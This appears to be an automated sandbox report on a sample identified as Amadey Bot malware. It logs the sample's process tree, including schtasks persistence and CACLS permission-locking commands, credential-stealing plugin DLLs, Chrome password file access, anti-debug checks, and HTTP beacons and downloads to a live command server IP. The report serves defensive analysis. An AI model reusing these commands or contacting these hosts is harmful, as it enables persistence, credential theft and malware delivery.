Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 27, 2023, 5 p.m.	Oct. 27, 2023, 5:02 p.m.

Size	1.6MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`c9aa05e75a369370955cf71b12a2121a`
SHA256	`3a5addf4fef89f397e1abe68c3e4605e13f1aefb20ac7a705e944dde4ccd5b8a`
CRC32	`C37EA312`
ssdeep	`24576:6dczsM3Cfptr89p7vyCuWk1s0BClDKBcPME5OLi:wWsM3Cfptr8z+CuWk1PBClDKBcBwLi`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) hide_executable_file - Hide executable file Is_DotNET_EXE - (no description)

cleanupdate.exe "C:\Users\test22\AppData\Local\Temp\cleanupdate.exe"
1532
- cleanupdate.exe C:\Users\test22\AppData\Local\Temp\cleanupdate.exe
  2176
  - Utsysc.exe "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
    2336
    - Utsysc.exe C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
      2432
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
        2524
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
        2576
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2664
        
        cacls.exe CACLS "Utsysc.exe" /P "test22:N"
        2708
        
        cacls.exe CACLS "Utsysc.exe" /P "test22:R" /E
        2788
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2836
        
        cacls.exe CACLS "..\ea7c8244c8" /P "test22:N"
        2872
        
        cacls.exe CACLS "..\ea7c8244c8" /P "test22:R" /E
        2928
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
        2372
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
        2300
        
        netsh.exe netsh wlan show profiles
        2380
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main
        2464
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.196.8.176	Active	Moloch
89.208.104.64	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49191 -> 185.196.8.176:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 185.196.8.176:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 185.196.8.176:80 -> 192.168.56.103:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.103:49177	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 27, 2023, 5 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 27, 2023, 5 p.m.			0	0
IsDebuggerPresent Oct. 27, 2023, 5 p.m.			0	0
IsDebuggerPresent Oct. 27, 2023, 5 p.m.			0	0
IsDebuggerPresent Oct. 27, 2023, 5 p.m.			0	0
IsDebuggerPresent Oct. 27, 2023, 4:53 p.m.			0	0
IsDebuggerPresent Oct. 27, 2023, 5 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 27, 2023, 5 p.m.	buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 27, 2023, 5 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 27, 2023, 5 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 27, 2023, 5 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (12 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d00c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d00c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d0188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d0388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d0388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006d0448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 27, 2023, 5 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0031f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 27, 2023, 5 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll

Performs some HTTP requests (4 events)

request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 118 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00440000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00415000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00911000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00406000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00912000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00913000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00914000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00915000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00916000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00917000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00918000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00919000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0091a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0091b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0091d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0091e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0091f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 1532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll

Creates a suspicious process (4 events)

